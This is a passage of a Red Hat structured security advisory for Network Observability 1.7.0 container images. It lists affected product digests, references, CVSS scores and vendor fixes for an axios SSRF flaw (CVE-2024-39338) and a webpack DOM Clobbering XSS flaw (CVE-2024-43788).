"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-39338", }, { category: "external", summary: "RHBZ#2304369", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2304369", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-39338", url: "https://www.cve.org/CVERecord?id=CVE-2024-39338", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-39338", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-39338", }, { category: "external", summary: "https://github.com/axios/axios/releases", url: "https://github.com/axios/axios/releases", }, { category: "external", summary: "https://jeffhacks.com/advisories/2024/06/24/CVE-2024-39338.html", url: "https://jeffhacks.com/advisories/2024/06/24/CVE-2024-39338.html", }, ], release_date: "2024-08-12T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-22T01:05:39+00:00", details: "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8014", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", version: "3.1", }, products: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "axios: axios: Server-Side Request Forgery", }, { cve: "CVE-2024-43788", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-08-27T17:20:06.890123+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2308193", }, ], notes: [ { category: "description", text: "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.", title: "Vulnerability description", }, { category: "summary", text: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", title: "Vulnerability summary", }, { category: "other", text: "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43788", }, { category: "external", summary: "RHBZ#2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43788", url: "https://www.cve.org/CVERecord?id=CVE-2024-43788", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", }, { category: "external", summary: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", url: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", }, { category: "external", summary: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", url: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", }, { category: "external", summary: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", url: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", }, { category: "external", summary: "https://scnps.co/papers/sp23_domclob.pdf", url: "https://scnps.co/papers/sp23_domclob.pdf", }, ], release_date: "2024-08-27T17:15:07.967000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-22T01:05:39+00:00", details: "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8014", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", 